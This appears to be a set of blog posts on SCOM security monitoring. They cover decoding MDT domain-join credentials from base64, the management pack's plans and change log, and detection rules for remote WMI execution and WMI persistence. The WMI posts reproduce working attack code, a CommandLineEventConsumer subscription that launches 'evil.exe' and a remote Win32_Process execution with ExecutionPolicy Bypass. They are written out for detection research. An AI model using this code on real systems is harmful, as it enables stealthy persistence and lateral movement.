Referencing Username and Password Credentials in an MDT Task Sequence

I don’t usually write about MDT, and I do not plan on making this a habit either. However, I ran into an issue doing some automation for a customer that I felt needed documentation. This is just as much for my own benefit as it is the for the 3 people who may find this useful, but there wasn’t much written about this online. Whenever I find myself in this situation, I usually turn it into a blog if the solution is not something that’s naturally intuitive.

First, to back up a bit. Microsoft Deployment Toolkit (MDT) is a free method of creating light and zero touch deployments for Operating System images across physical and/or virtual platforms. It’s generally installed as a sub-component to SCCM (which is not free). SCCM can provide more automation for those types of tasks and gets you around the problem that I’m describing here, but MDT can exist in a standalone environment especially if System Center is too expensive to purchase. Even at MSFT we do have use for MDT in certain types of engagements as it can be used to automate some of our own solutions that we bring into a customer environment without needing to setup a System Center infrastructure.

In this particular case, we needed to make use of some of the variables in the MDT scripting environment. It’s worth noting that there are a ton of variables available to use. A full list of what is available for you to use can be found in the variables.dat file that exists locally on the machine being built. This file is generated during deployment and is then removed once deployment is complete. I’m sure there’s a place on the MDT server which houses this, but I never got that far as this file was not removed when my task sequence was failing. The long and short is that you can edit this file with notepad and see all of the variables available for you to use in a scripting environment.

From a scripting standpoint, these variables can be referenced within the script being executed in your task sequence, allowing you some very powerful automation options. The problem, as we discovered is that some variables are not represented in clear text. As you can guess, this is typically username and password data. Both of these are in the variables.dat file, but not in readable form as they are store in base64 format. To be abundantly clear, nothing about this is secure. It’s meant only to prevent prying eyes from seeing usernames and passwords in clear text. Converting from base64 to ASCII is a single line of PowerShell, so whatever credentials you choose to put in MDT need to have only the permissions needed to do what task you need it to do. As well, physical access to your build environment is also paramount. Keep that in mind as well.

To start, we need to load the TS environment. This is easy to do and not hard to find online:

$tsenv = New-Object -ComObject Microsoft.SMS.TSEnvironment

At this point, we need to reference the variable. In my case, I’m going to use the domain join account that someone specifies during the installation wizard. You do this as such:

$Username = $Global:TSEnv.Value(“OSDJOINACCOUNT”)
$Password = $Global:TSEnv.Value(“OSDJOINPASSWORD”)

$Domain = $Global:TSEnv.Value(“DOMAINNAME”)

Again, that’s pretty easy. The $Domain value is in clear text, so there’s not much too this, but if you were to pull the OSDJOINACCOUNT and OSDJOINPASSWORD variables out of the variables.dat file, you’ll see something non-readable. The hard work in my case was figuring out what this format was. My assumption was that it was probably hashed like we do a typical password. That wasn’t the case and it took a lot of digging around to find an offhand comment on reddit that these were actually base64.  For a PowerShell professional, this is pretty easy, but for those of us who don’t breathe ISE, this is a bit more difficult. From there, you need this step:

$Password2 = [System.text.encoding]::ASCII.GetString([system.convert]::fromBase64String($Password))
$Username2 = [System.text.encoding]::ASCII.GetString([system.convert]::fromBase64String($Username))

Now we have the Username and Password in a format that a Task Sequence can use. The rest is pretty standard. I’m converting the password to a secure string and creating a credential object in PowerShell that can use it.

$CredPass = ConvertTo-SecureString $Password2 -AsPlainText -Force


$Credential = New-Object System.Management.Automation.PSCredential($Username2,$CredPass)

At this point, you have a credential that works, and whatever PowerShell command you’re trying to script that uses said credential can be given the $Credential variable.

That’s it.

Don’t ask me how to do it in VBS. I have no plans on learning that. 

Security Monitoring Future Plans (May 2019)

The good news about this project is that we’ve been able to knock out a lot of low hanging fruit that can be used to detect some of the bread crumbs that an attacker leaves behind as well as identifying where legacy protocols are being used. The bad news is that most of the low hanging fruit has been picked clean. This space will be used to help identify and track future plans.

I’m going to stick with a 1 year cadence. This has been developed mostly by me on my own time, and as such there’s only so many hours to go around. My current plans are as follows:

  • I would like to develop an administrative account monitoring component targeting admin accounts. I’m not sure how easily this will be able to be accomplished. Enumerating these against a DC is not that hard to do, but in order to alert on these, these objects would need to be created on each and every DC. This isn’t realistic from a performance standpoint. There’s currently an unhosted class and disabled discovery in this MP, but nothing is targeted against it. The hope would be to come up with a way to start tracking admin accounts in general, logons outside of business hours, etc.
  • I’m hoping to delve more into WMI monitoring with the next release.
  • There are a few rules that I could see re-writing to add overridable parameters.
  • Likely going to write some detection mechanisms around this SCOM vulnerability.

This is not a big list presently, but as time permits I hope to grow it. Any suggestions are always appreciated.

Security Monitoring Change Log May 2019

  • Updated Task Scheduler Creation Rule
  • Updated Service Creation on DC Rule
  • Disabled alert rule for Batch Logon. There is a report that is capturing this. The rule is still present and can be enabled.
  • Created override for Local Account Creation rules for domain controllers. While this didn’t appear in any testing, I was told that some security software can generate false positives for this one on domain controllers. Since DCs don’t have local accounts to begin with, I simply turned this off for domain controllers.
  • Fixed a bug with regsvr32 remote registration of DLL rule.
  • Added rules/discoveries associated with writeable locations in the OS. Note that there are three parts to this series.
  • Added rule to detect attempt to kill windows defender.
  • Added collection rule and report for TLS usage.
  • Added rules for suspicious PowerShell Usage.  For instructions on overrides, please see the addendum.
  • Removed dependency on SQL MP.
  • Added rule for WMI Persistence.
  • Added rules for WMI Remoting.
  • Distributed application
  • Added a timeout as an overridable parameter to the SMB1 collection rule. The specified timeout of 60 seconds was causing failures in my lab. I upped this value to 300 seconds as the default setting.
  • Turned off registry monitor for WDigest settings. This was not needed in Server 2012/2016. With Server 2008 going out of support, I’ve disabled the monitor. It is still present if someone desires to use it. 

Security Monitoring: Using SCOM to Detect Remote WMI Attempts

Last week, I wrote about a WMI persistence attempt, where an attacker can use the WMI scheduler to effectively hide a scheduled task within WMI. Today, I’m going to talk about another use of WMI that was in Matt Graeber’s paper: remoting. This is another thing that I suppose will happen from time to time in an environment, but I’m guessing it’s fairly rare given the plethora of remote administration tools out there.

I started by borrowing the PowerShell code needed to accomplish this. As you can see, the code isn’t that difficult to write:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList ‘powershell.exe -noexit -ExecutionPolicy Bypass -File \\scom1\new_share\badps.ps1’ -ComputerName SQL1 -Credential ‘nagau\nagau’

I essentially created a share on my SCOM server to execute a PowerShell script remotely on my SQL server using my credentials. A bad guy can do this too, though I’m also going to assume that they are using something a bit sophisticated to do this and would be passing the hash of a stolen account into this in some capacity. I’m not too worried about that at the moment, I’m more concerned with seeing what can be safely detected. The WMI logs were unfortunately useless. However, there were some interesting events in the security logs on both of the servers in question.  On my source server, the following event was captured:

image

This is a standard logon/logoff event, and you’ll see this pretty much every time something logs on to your system. On it’s own, that’s going to be a noisy event, but often times with this kind of stuff, the devil can be in the details, and I think the highlighted information may have some clues that there’s something on that shouldn’t be.  For one, this isn’t a standard RUNAS command, as the event ID implies. I tested this on the same system, but doing a local RUNAS will have the account name you used listed, but it will also have a target of localhost. The additional information will also say local host. The process name is also somewhat telling here, being svchost. While it’s not unusual to see svchost in a process, this event is telling us that svchost is making a remote procedure call. It’s probably worth noting that there was another 4648 on the same machine that told a bit more info about what I was doing, but I’m not sure it has anything useful that I could alert off of.

image

We can see from that event that I’m also targeting a remote server and that I’m using PowerShell_ISE to run the command, but ultimately an attacker is will be using their own tools, and if I knew the name of said process, I could just target that.  This particular event might be something worth searching for if the top event appears.

On the remote host, I also saw another telling event, in this case it was our 4688 that we routinely target:

image

If you look closely, you’ll notice that my PowerShell bypassed my execution policy. That alert fired as expected, so I won’t target that here. But the highlighted fields were also pretty unique for a typical 4688. You can see that WMI kicked off a PowerShell process, but under the context of the Network Service Account instead of the System account like one would typically see. The security ID also uses the NULL SID, which seems to differ from other Network Service account usages that created 4688 events. As such, I’m going to try out two new rules to see just how unique these guys are:

Rule 1 will target the security log looking for our 4648 with parameter 10 containing RPCSS, parameter 9 not containing the computer name, and parameter 12 containing SVC Host

Rule 2 will target the security log looking for a 4688 event with parameter 1 containing Network, parameter 10 containing NULL, and parameter 14 containing WmiPrvSe.exe

Note: For this to work properly, the process command line GPO MUST be set, otherwise, it will screw up the parameters.

I’ll let these bake and see if they make noise. Happy SCOMing.

Update 3/19 – SCOM can actually trigger one of these rules. It’s not surprising on investigation as SCOM will periodically have to restart the health service when it takes up too much CPU/RAM. Since my DC is chronically under-speced, I’m not surprised to find  SCOM doing this. Anyways, I’ve updated this rule to exclude SCOM’s remote WMI attempt.

Using SCOM to detect WMI Persistence Attempts

I have to tip my hat to a colleague (Ian Smith) for pointing me to this paper that Matt Graber did for Blackhat in 2015. It was an interesting read on how attackers can use WMI to do a number of things. I haven’t done much work within the Security Monitoring MP in regards to WMI, so this seems like some low hanging fruit to attack. Step one was to figure out what I could detect. I borrowed Matt’s code to do some simple tests. So for those that want to play along at home, here you go:

$filterName = ‘BotFilter82’
$consumerName = ‘BotConsumer23’
$exePath = ‘C:\Windows\System32\evil.exe’
$Query = “SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA ‘Win32_PerfFormattedData_PerfOS_System’ AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320”
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace “root\subscription” -Arguments @{Name=$filterName;EventNameSpace=”root\cimv2″;QueryLanguage=”WQL”;Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace “root\subscription” -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate =$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace “root\subscription” -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

This PowerShell basically creates what is known as a WMI subscription. Subscriptions, in and of themselves, are not bad things. Applications use them all the time for creating processes under certain conditions, but unfortunately, an attacker can do this too. In this case, Matt was demonstrating how an attacker can create a subscription to execute a command line based executable (evil.exe) once the system was up between 200 and 320 seconds. I’m not too terribly concerned with query needed to execute it. The big take away here is monitoring for the use of the command line event consumer, as we can train SCOM to potentially look for something useful.

That useful information was found in the WMI-Activity log with this event:

image

The 5861 that was generated appears to be fairly rare. I don’t see it anywhere else on my lab, and the event description clearly lays out the code that I ran. As such, I have an easy set of items to search for:

Event Log = Microsoft-Windows-WMI-Activity/Operational

Event ID = 5861

Event Description contains “//./root/subscription” AND “CommandLineEventConsumer”

I’ll let this bake in my lab, and hopefully we will see this added to the next edition of Security Monitoring. Happy SCOMing.

Update 3/19 – This rule fires not only when the schedule is created, but also any time the conditions are met for it to be rerun.. If you have something legitimate creating WMI schedules, you’ll probably want to disable this rule for that particular machine. I did add a suppression event by the logging computer, so you should only see a repeat count here. Simply investigate the cause, and if it’s legit, you’ll want to override it. Beyond that, it has been very quiet.

Security Monitoring Distributed Application: Monitoring Audit Settings

One of the drawbacks to the current design of the Security Monitoring Management Pack that I felt needed to be improved the reliance on some pre-canned GPOs that I provided for documentation. The main issue at hand is that I have a lot more turned on in these GPOs for auditing purposes than what is actually being monitored by the management pack. This was in large part due to needing to turn on auditing settings to see what types of events are generated and mining them for useful information that is worth generating alerts. This leads to a bit of a documentation mess in that I’ll reference in my documentation for individual rules/monitors if something needs to be turned on, but that also requires a lot of reading/surfing for the management pack users, especially if they do not want to simply use the GPOs I provide… until now.

The first step was creating an audit policy monitor type to look at a server’s individual audit settings. I’ve documented that here.

With the help of Ian Smith and Kevin Justin, we were able to build out a distributed application that will allow users to see which required audit settings are set. We will also be incorporating some new views into the MP to make it easy for users to see which settings needs to be adjusted. I’ll address the new views in a future post. For now, we will cover the distributed application.

The DA will be broken down by domain (there will be a distributed application for each domain in your forest). Each domain is further broken into two separate groups: Domain Controllers and Member Servers. The reason is fairly straight forward. Domain controllers, by default, are isolated in their own OU and typically have different auditing settings configured. Member Servers are a bit more complicated, as in theory they can have different audit settings. I’ll cover this in a bit more detail in a bit.

For now, let’s look at DCs. As you can see from the screen shot below, new monitors have been created for each audit configuration setting. For domain controllers, these are on by default. It’s also worth noting that these monitors do not generate alerts. This was done to avoid unnecessary alerting. If too much state change is an issue in your environment, you may want to consider turning off any that you have no plans of fixing. The individual monitors roll up to a dependency monitor (which uses a worst of algorithm), so if any audit setting is not configured correctly on one domain controller, the dependency monitor should be yellow (see screenshot below). Since DCs are all in the same OU, I would expect to see all of your DCs either yellow or green, though I suppose if there’s an issue with GPO application, it’s possible for this not to be the case.  In the screen shot below, you’ll see that the command line process auditing setting is not set correctly on my DC, and as such, the MP is not fully monitoring domain controllers on this lab. This particular monitor, for the record, looks at a registry key, though most of these will look at auditpol.exe results.

image

Member servers function in a similar capacity, though there are a few caveats. Member server monitoring is OFF by default. This is because these monitors would effectively be targeted against every server in the environment. This could potentially generate a lot of state change related items in your production environment and potentially cause performance issues with SCOM, not to mention clouding up Health Explorer with a whole bunch of servers where one audit setting is not set correctly. There is one exception to this. Member server auditing is enabled by default for your management servers. This is done via override within the Security Monitoring MP. As such, when you look your member server monitoring, you’ll see data from the management servers. If your have one audit policy per domain, as most environments typically do, then you’re done. You really don’t need to configure anything else. However, if by chance you have audit settings set at the OU level and have multiple OUs per monitored servers, you may want to consider turning on these monitors for one server in each OU that has a different audit policy.  You’ll have to do this on a monitor by monitor basis, so I’d recommend creating a SCOM group containing the Windows Computer Object for a single server from each OU and enabling the monitor for that group. In a smaller environment, you could consider simply turning this on for all Windows Computer Objects, but I don’t recommend that.  Member server monitoring will look something like this out of the box:

image

You will see an enabled monitor for your management server, and everything else will be not monitored. If your audit policies are determined at the domain level, you’re done. This view will show you if your audit settings are set correctly for DCs and member servers. A DA will also enumerate for each domain that you are monitoring. However, if you have customized your audit settings and set them by OU, then you may want to consider additional configuration. You should ignore the not monitored domain controllers, since they are covered under the domain controllers audit settings discussed above. Unfortunately, that is present due more to how targeted classes roll up in SCOM. With that said, if you are setting audit policies at the OU level, you may find it necessary to turn on these monitors for additional servers. In the example below, I turned on one of the monitors for my SQL server:

image

This can be done via override. Now it’s worth noting that you should really do this for each audit setting. That can be a bit tedious, and you may find the need to add more servers as new OUs are created. My recommendation would be to create a SCOM group in your unsealed overrides MP and simply do a one time override for the group for each of these monitors. At that point, you can simply add servers to the group.

Now to the downside. The biggest issue that I see with this is the need for Agent Proxy to be turned on. I’ve mentioned in previous articles that this is some sort of security feature, though I’ve yet to see any documentation as to what it’s mitigating against. My best guess would be a compromised agent potentially being used to submit bogus discovery data, though I’m not aware of any such threats associated with this or what an attacker would gain by utilizing this. Most of my customers simply turn this on for every agent by default.  As it is, you most likely have this on for domain controllers if you use the AD Management Pack along with a number of member servers as it’s required in the SQL and SharePoint Management Packs. If this is a big deal for you, then you probably don’t want to turn on the discoveries, as that will trigger an agent proxy alert for whatever you turn on.

One other slight caveat is that I may choose to rewrite this to target Windows OS instead of Windows Computer. That’s not that big a deal, and I’ll update this article accordingly.